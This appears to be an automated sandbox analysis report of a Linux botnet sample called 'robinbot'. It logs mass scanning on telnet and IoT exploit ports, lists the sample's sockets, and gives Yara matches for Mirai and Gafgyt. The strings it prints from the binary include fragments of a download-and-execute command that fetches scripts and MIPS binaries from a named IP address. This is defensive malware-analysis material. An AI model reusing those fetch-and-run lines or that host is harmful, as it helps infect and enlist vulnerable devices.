Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 54.6.154.146:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 55.85.248.107:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 65.170.196.42:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 107.89.146.145:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 143.144.130.65:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 115.100.246.114:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 204.213.205.118:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 44.70.201.148:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 114.154.146.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 84.126.30.181:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 72.96.228.219:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 5.249.17.203:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 29.105.195.127:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 50.40.194.3:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 162.78.6.107:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 220.202.211.41:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 91.36.64.44:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 139.131.111.14:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 23.22.98.112:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 109.11.173.177:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 110.140.165.131:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 223.6.247.130:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 107.233.118.154:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 94.26.22.117:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 44.179.158.49:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 119.11.139.79:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 105.66.194.214:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 75.26.181.151:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 213.4.250.93:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 1.136.86.171:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 79.83.63.161:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 67.151.50.197:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 169.173.222.182:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 75.6.93.112:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 48.236.86.172:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 15.192.178.237:2323
Source: global traffic	TCP traffic: 192.168.2.20:59856 -> 187.119.191.232:8080
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 95.52.106.171:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 2.149.147.150:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 33.148.92.70:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 171.173.99.26:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 108.208.102.205:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 130.216.49.6:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 96.158.69.6:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 93.51.139.184:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 96.83.234.242:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 216.46.203.199:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 119.249.93.179:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 158.212.150.123:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 82.232.99.98:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 165.251.205.13:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 62.112.225.121:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 158.204.80.148:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 2.214.55.57:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 106.189.126.165:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 115.4.227.195:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 71.181.130.227:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 91.109.14.17:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 160.30.6.161:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 44.117.53.207:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 79.95.201.126:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 115.193.18.50:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 139.64.21.84:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 207.100.22.63:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 9.25.164.58:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 88.170.167.42:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 177.223.99.112:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 31.233.64.156:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 153.116.66.16:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 17.174.21.93:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 79.117.93.26:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 161.84.160.216:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 64.10.38.215:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 128.75.30.64:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 16.66.216.208:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 222.134.132.190:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 80.177.116.178:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 89.60.180.230:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 186.130.167.134:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 114.91.131.16:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 87.141.30.72:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 32.227.145.174:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 108.73.29.204:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 106.155.152.197:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 124.65.63.81:2323
Source: global traffic	TCP traffic: 192.168.2.20:41358 -> 187.245.213.139:8080
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 11.218.149.26:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 110.210.0.7:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 157.169.77.132:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 5.135.137.173:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 132.161.54.74:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 31.220.244.241:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 187.192.10.153:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 3.231.89.198:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 115.97.197.218:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 113.38.186.195:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 89.63.29.167:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 43.38.71.86:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 71.118.231.208:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 183.250.197.133:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 181.180.110.135:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 71.148.112.115:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 70.235.235.75:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 32.52.35.23:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 221.142.142.57:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 180.211.170.16:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 85.231.39.47:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 183.131.151.92:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 195.34.132.90:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 50.5.252.251:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 212.233.55.201:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 75.97.244.246:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 52.180.129.119:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 67.141.38.213:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 177.133.155.80:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 116.186.50.145:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 116.212.180.80:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 62.196.12.160:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 136.8.93.180:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 164.57.193.76:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 46.167.217.53:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 98.121.27.54:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 157.95.21.205:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 43.160.254.106:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 72.228.102.105:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 94.17.137.86:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 149.35.160.212:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 137.106.150.131:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 22.136.128.97:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 189.249.205.243:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 71.211.243.4:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 121.110.73.27:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 33.132.113.87:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 167.158.157.57:2323
Source: global traffic	TCP traffic: 192.168.2.20:36688 -> 189.38.139.35:8080
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 200.151.49.59:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 142.121.197.7:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 77.66.22.4:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 199.87.129.117:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 8.129.133.147:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 95.195.226.70:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 13.42.219.133:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 21.117.53.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 154.151.66.94:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 122.66.123.169:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 121.39.224.137:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 44.111.126.19:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 102.229.168.3:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 153.214.121.126:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 143.98.42.186:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 139.191.181.20:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 54.31.132.214:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 163.37.245.24:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 113.245.14.6:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 168.97.206.194:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 109.27.179.30:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 189.116.191.64:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 179.95.137.156:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 95.38.160.52:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 108.228.239.195:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 149.82.51.33:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 157.80.239.181:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 167.181.60.65:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 52.65.175.98:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 51.245.110.17:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 39.246.123.239:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 2.210.145.46:2323
Source: global traffic	TCP traffic: 192.168.2.20:41170 -> 187.46.99.177:8080
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 219.122.105.221:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 108.240.60.197:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 27.135.198.213:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 220.148.44.31:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 149.171.118.135:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 144.252.121.112:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 213.226.154.87:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 166.247.194.109:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 16.133.163.123:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 176.98.151.86:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 123.172.10.234:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 137.160.241.156:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 118.191.83.238:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 44.215.225.207:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 176.189.183.229:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 140.164.70.61:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 25.158.61.237:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 93.120.73.32:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 121.151.162.233:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 154.230.112.114:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 24.178.223.210:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 188.127.51.54:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 68.42.44.95:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 137.98.13.32:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 89.232.237.134:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 100.16.103.72:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 214.199.75.211:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 163.4.151.124:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 165.216.141.58:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 166.231.158.138:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 134.162.203.241:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 97.217.0.76:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 173.78.32.4:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 139.130.20.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 16.76.40.204:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 138.31.232.216:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 159.232.28.131:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 22.253.251.152:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 44.144.16.201:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 179.137.100.52:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 77.110.228.69:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 167.241.180.160:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 133.162.195.74:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 39.169.161.170:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 211.69.184.58:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 81.164.55.227:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 202.188.206.186:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 197.47.245.230:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 182.19.32.242:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 94.98.36.29:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 12.28.211.180:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 157.77.58.92:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 205.218.25.88:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 99.252.11.90:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 158.136.212.224:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 176.173.120.82:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 86.82.172.87:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 101.251.200.37:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 38.12.182.131:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 206.174.59.37:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 88.85.4.247:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 40.160.100.143:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 132.90.101.151:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 28.31.41.64:2323
Source: global traffic	TCP traffic: 192.168.2.20:40122 -> 121.227.36.161:52869
Source: global traffic	TCP traffic: 192.168.2.20:37258 -> 216.148.34.2:52869
Source: global traffic	TCP traffic: 192.168.2.20:58652 -> 165.138.116.213:52869
Source: global traffic	TCP traffic: 192.168.2.20:50706 -> 42.153.99.93:52869
Source: global traffic	TCP traffic: 192.168.2.20:34530 -> 171.2.190.24:52869
Source: global traffic	TCP traffic: 192.168.2.20:37156 -> 136.69.233.238:52869
Source: global traffic	TCP traffic: 192.168.2.20:55608 -> 67.151.29.209:52869
Source: global traffic	TCP traffic: 192.168.2.20:51396 -> 183.78.182.208:52869
Source: global traffic	TCP traffic: 192.168.2.20:33894 -> 183.88.38.240:8080
Source: global traffic	TCP traffic: 192.168.2.20:49558 -> 112.191.186.107:8080
Source: global traffic	TCP traffic: 192.168.2.20:51920 -> 148.135.41.142:8080
Source: global traffic	TCP traffic: 192.168.2.20:46692 -> 88.109.40.245:8080
Source: global traffic	TCP traffic: 192.168.2.20:34742 -> 96.65.200.17:8080
Source: global traffic	TCP traffic: 192.168.2.20:58436 -> 33.167.163.147:8080
Source: global traffic	TCP traffic: 192.168.2.20:42454 -> 178.198.5.222:8080
Source: global traffic	TCP traffic: 192.168.2.20:47414 -> 104.170.207.190:8080
Source: global traffic	TCP traffic: 192.168.2.20:59518 -> 78.10.169.100:8080
Source: global traffic	TCP traffic: 192.168.2.20:41696 -> 150.155.178.72:37215
Source: global traffic	TCP traffic: 192.168.2.20:37166 -> 81.228.113.97:37215
Source: global traffic	TCP traffic: 192.168.2.20:36476 -> 161.88.30.216:37215
Source: global traffic	TCP traffic: 192.168.2.20:37112 -> 168.64.202.149:37215
Source: global traffic	TCP traffic: 192.168.2.20:36146 -> 7.88.193.142:37215
Source: global traffic	TCP traffic: 192.168.2.20:40052 -> 196.56.226.212:7574

Source: /tmp/robinbot (PID: 9448)	Socket: 0.0.0.0::23
Source: /tmp/robinbot (PID: 9448)	Socket: 0.0.0.0::0
Source: /tmp/robinbot (PID: 9448)	Socket: 0.0.0.0::80

Source: unknown	TCP traffic detected without corresponding DNS query: 163.151.162.85
Source: unknown	TCP traffic detected without corresponding DNS query: 83.190.241.252
Source: unknown	TCP traffic detected without corresponding DNS query: 20.19.233.226
Source: unknown	TCP traffic detected without corresponding DNS query: 45.81.142.31
Source: unknown	TCP traffic detected without corresponding DNS query: 86.8.87.39
Source: unknown	TCP traffic detected without corresponding DNS query: 167.5.212.208
Source: unknown	TCP traffic detected without corresponding DNS query: 82.130.119.117
Source: unknown	TCP traffic detected without corresponding DNS query: 54.213.36.74
Source: unknown	TCP traffic detected without corresponding DNS query: 95.60.53.181
Source: unknown	TCP traffic detected without corresponding DNS query: 104.142.173.149
Source: unknown	TCP traffic detected without corresponding DNS query: 88.61.106.82
Source: unknown	TCP traffic detected without corresponding DNS query: 27.153.74.237
Source: unknown	TCP traffic detected without corresponding DNS query: 196.140.221.108
Source: unknown	TCP traffic detected without corresponding DNS query: 17.50.61.226
Source: unknown	TCP traffic detected without corresponding DNS query: 180.180.89.207
Source: unknown	TCP traffic detected without corresponding DNS query: 206.35.61.39
Source: unknown	TCP traffic detected without corresponding DNS query: 223.167.249.150
Source: unknown	TCP traffic detected without corresponding DNS query: 44.14.123.140
Source: unknown	TCP traffic detected without corresponding DNS query: 202.48.66.143
Source: unknown	TCP traffic detected without corresponding DNS query: 188.159.123.206
Source: unknown	TCP traffic detected without corresponding DNS query: 209.184.177.135
Source: unknown	TCP traffic detected without corresponding DNS query: 60.220.164.58
Source: unknown	TCP traffic detected without corresponding DNS query: 122.6.32.167
Source: unknown	TCP traffic detected without corresponding DNS query: 46.21.99.14
Source: unknown	TCP traffic detected without corresponding DNS query: 147.27.52.221
Source: unknown	TCP traffic detected without corresponding DNS query: 76.245.236.136
Source: unknown	TCP traffic detected without corresponding DNS query: 150.104.214.104
Source: unknown	TCP traffic detected without corresponding DNS query: 160.9.111.142
Source: unknown	TCP traffic detected without corresponding DNS query: 147.71.201.65
Source: unknown	TCP traffic detected without corresponding DNS query: 137.243.81.5
Source: unknown	TCP traffic detected without corresponding DNS query: 219.172.207.151
Source: unknown	TCP traffic detected without corresponding DNS query: 121.113.44.14
Source: unknown	TCP traffic detected without corresponding DNS query: 13.96.107.89
Source: unknown	TCP traffic detected without corresponding DNS query: 213.89.225.108
Source: unknown	TCP traffic detected without corresponding DNS query: 193.185.85.99
Source: unknown	TCP traffic detected without corresponding DNS query: 66.68.113.85
Source: unknown	TCP traffic detected without corresponding DNS query: 11.186.151.230
Source: unknown	TCP traffic detected without corresponding DNS query: 104.103.254.113
Source: unknown	TCP traffic detected without corresponding DNS query: 91.80.118.85
Source: unknown	TCP traffic detected without corresponding DNS query: 194.34.99.79
Source: unknown	TCP traffic detected without corresponding DNS query: 2.206.168.216
Source: unknown	TCP traffic detected without corresponding DNS query: 67.26.77.133
Source: unknown	TCP traffic detected without corresponding DNS query: 95.62.219.106
Source: unknown	TCP traffic detected without corresponding DNS query: 90.208.83.53
Source: unknown	TCP traffic detected without corresponding DNS query: 33.201.138.99
Source: unknown	TCP traffic detected without corresponding DNS query: 188.218.71.100
Source: unknown	TCP traffic detected without corresponding DNS query: 39.27.47.6
Source: unknown	TCP traffic detected without corresponding DNS query: 89.138.240.83
Source: unknown	TCP traffic detected without corresponding DNS query: 19.135.140.179
Source: unknown	TCP traffic detected without corresponding DNS query: 125.194.52.215

Source: robinbot	String found in binary or memory: http://89.203.251.188/bin.sh;chmod
Source: robinbot	String found in binary or memory: http://89.203.251.188/bins.sh
Source: robinbot	String found in binary or memory: http://89.203.251.188/bins.sh;$
Source: robinbot	String found in binary or memory: http://89.203.251.188/bins.sh;chmod
Source: robinbot	String found in binary or memory: http://89.203.251.188/bins.sh;sh
Source: robinbot	String found in binary or memory: http://89.203.251.188/bins.sh;sh$
Source: robinbot	String found in binary or memory: http://89.203.251.188/mips
Source: robinbot	String found in binary or memory: http://89.203.251.188/mipsel
Source: robinbot	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: robinbot	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: robinbot	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Malicious sample detected (through community Yara rule)

Source: robinbot, type: SAMPLE	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
